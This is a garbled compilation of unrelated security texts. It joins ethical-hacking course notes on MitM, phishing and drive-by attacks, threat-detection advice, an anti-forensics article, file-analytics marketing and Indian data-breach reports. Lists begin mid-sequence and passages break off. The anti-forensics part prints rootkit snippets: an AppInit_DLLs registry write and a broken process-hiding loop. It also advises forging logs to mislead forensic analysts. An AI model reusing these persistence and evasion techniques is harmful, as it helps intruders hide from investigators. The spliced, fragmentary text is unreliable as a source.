interfaces (GUIs) that support applications and system tools, and enable Internet access.
Extensive tweaking is required to lock them down. Attackers constantly look for OS
vulnerabilities that allow them to exploit and gain access to a target system or network.
To stop attackers from compromising the network, the system or network
administrators must keep abreast of various new exploits and methods adopted by
attackers, and monitor the networks regularly.
2. Misconfiguration Attacks
3. Application-Level Attacks
Software developers are often under intense pressure to meet deadlines, which can
mean they do not have sufficient time to completely test their products before shipping
them, leaving undiscovered security holes. This is particularly troublesome in newer
software applications that come with a large number of features and functionalities,
making them more and more complex. An increase in the complexity means more
opportunities for vulnerabilities. Attackers find and exploit these vulnerabilities in the
applications using different tools and techniques to gain unauthorized access and steal
or manipulate data.
Security is not always a high priority to software developers, and they handle it as an
“add-on” component after release. This means that not all instances of the software will
have the same level of security. Error checking in these applications can be very poor (or
even nonexistent), which leads to:
Software developers often use free libraries and code licensed from other sources in
their programs to reduce development time and cost. This means that large portions of
many pieces of software will be the same, and if an attacker discovers vulnerabilities in
that code, many pieces of software are at risk.
Attackers exploit default configuration and settings of the off-the-shelf libraries and
code. The problem is that software developers leave the libraries and code unchanged.
They need to customize and fine-tune every part of their code in order to make it not
only more secure, but different enough so that the same exploit will not work.
An attack can be active or passive. An “active attack” attempts to alter system resources or affect
their operation. A “passive attack” attempts to learn or make use of information from the system
but does not affect system resources (e.g., wiretapping).you can learn all types of attack in CEH
v10 location in Mumbai. The infosavvy provides the certified Ethical hacking training and EC
Council Certification.
A MitM attack occurs when a hacker inserts itself between the communications of a
client and a server. Here are some common types of man-in-the-middle attacks:
Session hijacking
In this type of MitM attack, an attacker hijacks a session between a trusted client and
network server. The attacking computer substitutes its IP address for the trusted client
while the server continues the session, believing it’s communicating with the client. as
an example , the attack might unfold like this:
4. The attacker’s computer replaces the client’s IP address with its own IP address and
spoofs the client’s sequence numbers.
5. The attacker’s computer continues dialog with the server and therefore the server
believes it’s still communicating with the client.
IP Spoofing
Replay
A replay attack occurs when an attacker intercepts and saves old messages then tries to
send them later, impersonating one among the participants. this sort can be easily
countered with session timestamps or nonce (a random number or a string that changes
with time).
So, how can you confirm that P’s public key belongs to P and to not A? Certificate
authorities and hash functions were created to solve this problem. When person 2 (P2)
wants to send a message to P, and P wants to be sure that A won’t read or modify the
message which the message actually came from P2, the following method must be used:
1. P2 creates a symmetric key and encrypts it with P’s public key.
2. P2 sends the encrypted symmetric key to P.
3. P2 computes a hash function of the message and digitally signs it.
4. P2 encrypts his message and therefore the message’s signed hash using the symmetric
key and sends the whole thing to P.
5. P is able to receive the symmetric key from P2 because only he has the private key to
decrypt the encryption.
6. P, and only P, can decrypt the symmetrically encrypted message and signed hash
because he has the symmetric key.
7. he’s ready to verify that the message has not been altered because he can compute the
hash of received message and compare it with digitally signed one.
8. P is additionally ready to convince himself that P2 was the sender because only P2 can
sign the hash in order that it’s verified with P2 public key.
Phishing attack is that the practice of sending emails that appear to be from trusted
sources with the goal of gaining personal information or influencing users to do
something. It combines social engineering and technical trickery. It could involve an
attachment to an email that loads malware onto your computer. It could even be a link
to an illegitimate website which will trick you into downloading malware or handing
over your personal information.
Spear phishing may be a very targeted sort of phishing activity. Attackers take the time
to conduct research into targets and make messages that are personal and relevant. due
to this, spear phishing are often very hard to spot and even harder to defend against.
one among the only ways in which a hacker can conduct a spear phishing attack is email
spoofing, which is when the information within the “From” section of the e-mail is
falsified, making it appear as if it’s coming from someone you recognize , like your
management or your partner company. Another technique that scammers use to add
credibility to their story is website cloning — they copy legitimate websites to fool you
into entering personally identifiable information (PII) or login credentials.
Critical thinking — don’t accept that an email is that the real deal just because you’re
busy or stressed otherwise you have 150 other unread messages in your inbox. Stop for
a moment and analyze the e-mail.
Hovering over the links — Move your mouse over the link, but don’t click it! Just let your
mouse cursor h over over the link and see where would actually take you. Apply critical
thinking to decipher the URL.
Analyzing email headers — Email headers define how an email need to your address. The
“Reply-to” and “Return-Path” parameters should lead to the same domain as is stated
within the email.
Sandboxing — you’ll test email content during a sandbox environment, logging activity
from opening the attachment or clicking the links inside the e-mail .
7. Drive-by attack
Drive-by download attacks are a standard method of spreading malware. Hackers search
for insecure websites and plant a malicious script into HTTP or PHP code on one among
the pages. This script might install malware directly onto the pc of somebody who visits
the site, or it’d re-direct the victim to a site controlled by the hackers. Drive-by
downloads can happen when visiting a website or viewing an email message or a pop-
up window. Unlike many other types of cyber security attacks, a drive-by doesn’t rely on
a user to do anything to actively enable the attack — you don’t need to click a
download button or open a malicious email attachment to become infected. A drive-by
download can cash in of an app, operating system or web browser that contains security
flaws thanks to unsuccessful updates or lack of updates.
To protect yourself from drive-by attacks, you would like to stay your browsers and
operating systems up to date and avoid websites which may contain malicious code.
stick with the sites you normally use — although keep in mind that even these sites are
often hacked. Don’t keep too many unnecessary programs and apps on your device. The
more plug-ins you have, the more vulnerabilities there are which will be exploited by
drive-by attacks.
Threat detection and response is the practice of identifying any malicious activity
that could compromise the network and then composing a proper response to
mitigate or neutralize the threat before it can exploit any present vulnerabilities.
Detecting Threats
These threats are considered "known" threats. However, there are additional
“unknown” threats that an organization aims to detect. This means the organization
hasn't encountered them before, perhaps because the attacker is using new
methods or technologies.
Known threats can sometimes slip past even the best defensive measures, which is
why most security organizations actively look for both known and unknown threats
in their environment. So how can an organization try to detect both known and
unknown threats?
Unknown threats are those that haven't been identified in the wild (or are ever-
changing), but threat intelligence suggests that threat actors are targeting a swath
of vulnerable assets, weak credentials, or a specific industry vertical. User behavior
analytics (UBA) are invaluable in helping to quickly identify anomalous behavior -
possibly indicating an unknown threat - across your network. UBA tools establish a
baseline for what is "normal" in a given environment, then leverage analytics (or in
some cases, machine learning) to determine and alert when behavior is straying
from that baseline.
Attacker behavior analytics (ABA) can expose the various tactics, techniques, and
procedures (TTPs) by which attackers can gain access to your corporate network.
TTPs include things like malware, cryptojacking (using your assets to mine
cryptocurrency), and confidential data exfiltration.
During a breach, every moment an attacker is undetected is time for them to tunnel
further into your environment. A combination of UBAs and ABAs offer a great
starting point to ensure your security operations center (SOC) is alerted to potential
threats as early as possible in the attack chain.
A great incident response plan and playbook minimizes the impact of a breach and
ensures things run smoothly, even in a stressful breach scenario. If you're just
getting started, some important considerations include:
Defining roles and duties for handling incidents: These responsibilities, including
contact information and backups, should be documented in a readily accessible
channel.
Considering who to loop in: Think beyond IT and security teams to document which
cross-functional or third-party stakeholders – such as legal, PR, your board, or
customers – should be looped in and when. Knowing who owns these various
communications and how they should be executed will help ensure responses run
smoothly and expectations are met along the way.
Security event threat detection technology to aggregate data from events across the
network, including authentication, network access, and logs from critical systems.
Network threat detection technology to understand traffic patterns on the network
and monitor network traffic, as well as to the internet.
Endpoint threat detection technology to provide detailed information about possibly
malicious events on user machines, as well as any behavioral or forensic information to
aid in investigating threats.
Penetration tests, in addition to other preventative controls, to understand detection
telemetry and coordinate a response.
A Proactive Threat Detection Program
To add a bit more to the element of telemetry and being proactive in threat
response, it’s important to understand there is no single solution. Instead, a
combination of tools acts as a net across the entirety of an organization's attack
surface, from end to end, to try and capture threats before they become serious
problems.
Some targets are just too tempting for an attacker to pass up. Security teams know
this, so they set traps in hopes that an attacker will take the bait. Within the context
of an organization's network, an intruder trap could include a honeypot target that
may seem to house network services that are especially appealing to an attacker.
These “honey credentials” appear to have user privileges an attacker would need in
order to gain access to sensitive systems or data.
When an attacker goes after this bait, it triggers an alert so the security team knows
there is suspicious activity in the network they should investigate. Learn more about
the different types of deception technology.
Threat Hunting
Instead of waiting for a threat to appear in the organization's network, a threat hunt
enables security analysts to actively go out into their own network, endpoints, and
security technology to look for threats or attackers that may be lurking as-yet
undetected. This is an advanced technique generally performed by veteran security
and threat analysts.
Anti-forensics – Part 1
Data Forgery
Analysis Prevention
Online Anonymity
Note that not all anti-forensic methods are covered by this document,
due to space reasons or because some are very easy to detect. Details
on some of these techniques have been deliberately omitted, always
for space reasons and because of the large amount of information
already present online.
Most hard drives have, at the beginning, some space reserved for MBR
(Master Boot Record). This contains the necessary code to begin
loading an OS and also contains the partition tables. The MBR also
defines the location and size of each partition, up to a maximum four.
The MBR only requires a single sector. From this and the first partition,
we can find 62 unused sectors (sector n. 63 is to be considered the
start of cylinder 1). For a classic DOS-style partition table, the first
partition needs to start here.
HPA Area
Example:
DCO area
The more effective way to detect DCO areas remains the use of ATA
command DEVICE CONFIGURATION IDENTIFY, which is able to show
the real size of a disk. Comparing the output of this command with that
resulting from the command READ_NATIVE_MAX_ADDRESS makes it
easy to find any hidden areas. It’s also important to note that “ The ATA
Forensic Tool” is also able to find hidden areas of this kind.
The “Slack Space,” in a nutshell, is the unused space between the end
of a stored file, and the end of a given data unit, also known as cluster
or block. When a file is written into the disk, and it doesn’t occupy the
entire cluster, the remaining space is called slack space. It’s very
simple to imagine that this space can be used to store secret
information.
The image below shows a graphical representation of how the slack
space can appear within a cluster:
For example, consider the 8-bit binary number 11111111 (1 byte): the
right-most 1-bit is considered the least significant because it’s one
that, if changed, has the least effect on the value of this number.
Taking into account a bearing image, therefore, the idea is to break
down the binary format of the message and put it on the LSBs of each
pixel of the image. Steganography, obviously, may be used with many
types of file formats, such as audio, video, binary and text. Other
steganographic techniques that should surely be mentioned are the
Bit-Plane Complexity Segmentation (BPCS), the Chaos Based Spread
Spectrum Image Steganography (CSSIS) and Permutation
Steganography (PS). Going into the details of all steganographic
algorithms however, is beyond the scope of this document and should
be dealt with through a dedicated paper.
Encryption
Using a good Hex Editor however, it’s possible to modify this string
with something random or misleading. Because of the large amount of
information about both the tools and symmetric cryptographic
algorithms, these will not be discussed in detail in this document, but,
generally, it is very important to always maintain a reasonable doubt
on the use of cryptographic algorithms within our systems, especially
to avoid an analyst being able to prove the presence of an encrypted
area.
Rootkits
Rootkits are often used to mask files, directories, registry keys and
active processes, and lend themselves to in-depth considerations.
They are, of course, effective only in the course of a live analysis of
the system under investigation.
Usually, we can divide them into two main categories, closely related
to the area in which they work: UserSpace Rootkit (Ring 3)
and KernelSpace Rootkit (Ring 0). Because they are able to alter the
resulting output of standard system function calls, they can,
consequently, also alter the results of forensics tools.
[plain]RegOpenKeyEx(HKEY_LOCAL_MACHINE,”SoftwareMicrosoftWin
dows NTCurrentVersionWindows”,0,KEY_SET_VALUE,&hKey );
GetWindowsDirectory(PATH_SISTEMA,sizeof(PATH_SISTEMA));
strcat_s(PATH_SISTEMA,”my_rootkit_library.dll”);
RegSetValueEx(hKey,”Appinit_Dlls”,0,REG_SZ,(const
unsigned
char*)PATH_SISTEMA,sizeof(PATH_SISTEMA));
[/plain]
Next, this is the main code of our custom prepared DLL to hide a
specific process in our system through the use of Mhook library:
[plain]do
{
pCurrent = pNext;
pNext = (PMY_SYSTEM_PROCESS_INFORMATION)((PUCHAR)pCurrent +
pCurrent->NextEntryOffset);
pNext = pCurrent;
}
}
while(pCurrent->NextEntryOffset != 0);
}
[/plain]
Once the value of the registry key is modified, the result is that the
process “notepad.exe” will no longer be shown in software like Task
Manager or Process Explorer.
Often, however, for more complex threats that are usually created in a
customized manner, these may not be sufficient, because it is also
possible, by simultaneously using different rootkit techniques
on userspace and kernelspace, to deeply modify an operating
system, until the point that standard anti-rootkit algorithms of common
anti-rootkit tools fail to detect such hidden active processes, for
example. The following image shows, in fact, through a custom and
powerful rootkit (the details of which will not be discussed in this
document), that we can alter the final “Process List” output of GMER,
a well known anti-rootkit tool, while our rootkit hides the process
“cmd.exe“…
Data Forgery
Even in this case, the technique relies on the fact that if information
cannot be identified, it cannot be analyzed.
Transmogrification
There are many packers and encryptors available for this purpose, but
most of them are easily identifiable and, usually, it is very easy to
recover the code protected through them. In contrast, a custom
“homemade” packer definitely adds a new level of security in this
sense, as it will almost certainly require the assistance of a
specialized software reverse engineer (increasing the cost and time of
analysis) to analyze it in depth.
Of course, each key will not be stored in clear in our program (even if
compressed), but will be generated at runtime from an initial value at
our discretion. To conclude, it’s important to know that, because
sooner or later our program will have to start, and this software
protection should be considered as a temporary analysis
countermeasure because a good reverser will still be able to go back
to the original protected instructions.
It’s important to note that not all file systems record the same
information about these parameters and not all operating systems
take advantage of the opportunity given by the file system to record
this information.
Log files
There’s not much to say about the log files. Every computer
professional knows of their existence and the ease with which they
can be altered. Specifically, in contrast to a forensic analysis, the log
files can be altered in order to insert dummy, misleading or malformed
data. Simply, they can also be destroyed. However, the latter case is
not recommended, because a forensic analyst expects to find some
data if he goes to look for them in a specific place, and, if he doesn’t
find them, will immediately think that some manipulation is in place,
which of course could also be demonstrated. The best way to deal
with log files is to allow the analyst to find what he is looking for, but
of course making sure that he will see what we want him to see.
It’s good to know that the first thing that a forensic analyst will do if
he suspects a log alteration, will be to try to find as many alternative
sources as possible, both inside and outside of the analyzed system.
So it is good to pay attention to any log files replicated or redundant
(backups?!).
Data deletion
If you want to irreversibly delete your data, you should consider the
adoption of this technique. When we delete a file in our system, the
space it formally occupied is in fact marked only as free. The content
of this space, however, remains available, and a forensics analyst
could still recover it. The technique known as “disk wiping” overwrites
this “space” with random data or with the same data for each sector of
disk, in such a way that the original data is no longer recoverable.
Generally, in order to counter the use of advanced techniques for file
recovery, more “passages” for each sector and specific overwriting
patterns are adopted.
Meta-data shredding
Physical destruction
It has been estimated that 80-90% of all business data is unstructured, and 80% of this is
never even retrieved again once it has served its purpose.
While eDRMS tools such as Content Manager allow you to structure your information
and manage it appropriately, we have seen a number of organisations still struggle to
contain all of their corporate information to a single managed system, which can then
introduce security, searchability and governance risks.
Users will be users, and if they can save information somewhere more convenient, they
will!
There is, however, a solution that does not require businesses to radically change the
way they do everything though.
File analysis tools allow organisations to connect to multiple sets of different types data,
understand exactly what they are holding, and action it. This includes file shares, emails,
archive systems, SharePoint, eDRMS and many more.
ControlPoint and Data Discovery, two leading file analysis products from Micro Focus,
have been used by WyldLynx both internally and extensively with a number of clients
over the past 5 years.
With very similar file analysis functionality, the main difference between the two
products is that ControlPoint is run as a locally installed product, where Data Discovery
is cloud based. Click the links to learn more about these two powerful and helpful tools.
The introduction of these tools has allowed for a vast number of wins relating to legacy
data clean up and locating key data, including:
Identifying duplicates, trivial files, and information no longer required, as well as allowing
the clean-up of this information to create more space
Scoured repositories for key project/sensitive information and relocate it to the managed
information system
Responded to Information Requests with certainty that all information stores have been
assessed
Responded to potential security breaches with confidence that you know what is being
held
Actioned Commission of Inquiry or Royal Commission disposal freezes by locating and
placing a hold on in-scope information
Understood the history and story of data growth and analyse based on a range of filters
Throughout these processes, we have seen both tangible and non-tangible benefits for
all of our analytics customers. Here are a few highlights from some of our experiences
with ControlPoint and Data Discovery on actual, real world business data:
This customer had 20 terabytes of unstructured data of which 50%(!) was duplicated
across their environment. By de-duplicating the data they estimated a saving of $2.5
Million dollars over 5 years in storage alone.
The Federal and QLD government issued a disposal freeze on records relating to
vulnerable people. File analytics was used to locate information in scope, and then apply
a hold to these records so that they could not be deleted or edited until the disposal
freeze was lifted.
WyldLynx always reiterates to our customers that no matter what policies they have in
place for storing sensitive information (such as credit card details), users will be users
and may not actually consider the policy while in the process of doing their work. After
undertaking a pattern matching exercise across their data stores, we found that 1% of a
customer's unstructured (and unsecured) data contained a pattern matching a credit
card pattern. This allowed the customer to relocate and secure this information into
Content Manager with the correct security applied.
Cloud migration
A customer needed to make sure they did not transfer their 'junk' from their on-premise
storage over to SharePoint during their cloud transition. They were able to relocate their
transient information (non-records) from the file system into an archive drive, and
relocate only what was relevant to the cloud (using time and content-based rules and
policies). The transient information was then due to be destroyed automatically after
two years of not being accessed.
As you can see there is a large range of use cases for file analytics, and the list is
continuing to grow.
The takeaway: Wearable devices like Fitbits monitor location via GPS
and activities like distance traveled, steps taken, sleep time and heart
rate. The devices are configured to synchronize data to applications
on smartphones and personal computers or to cloud or social media
sites. Evidentiary collections can be made from either of these
sources using standard digital forensics tools and techniques.
Case study three: Data from asset trackers – sensors and IoT devices
Details: 180 million Domino’s India pizza orders are up for sale on
the dark web, according to Alon Gal, CTO of cyber intelligence firm
Hudson Rock.
Gal found someone asking for 10 bitcoin (roughly $535,000 or ₹4
crore) for 13TB of data that they said included 1 million credit card
records and details of 180 million Dominos India pizza orders, topped
with customers’ names, phone numbers, and email addresses. Gal
shared a screenshot showing that the hacker also claimed to have
details of the Domino’s India’s 250 employees, including their
Outlook mail archives dating back to 2015.
The seller shared a sample of the data dump with the information of
10,000 exam candidates with CloudSEK. The information shared by
the company shows that the leaked information contained full
names, mobile numbers, email IDs, dates of birth, FIR records and
criminal history of the exam candidates.
The user data is up for sale on the dark web for around $5000,
according to independent cybersecurity researcher Rajshekhar
Rajaharia.
Details: User data from online grocery platform BigBasket is for sale
in an online cybercrime market, according to Atlanta-based cyber
intelligence firm Cyble.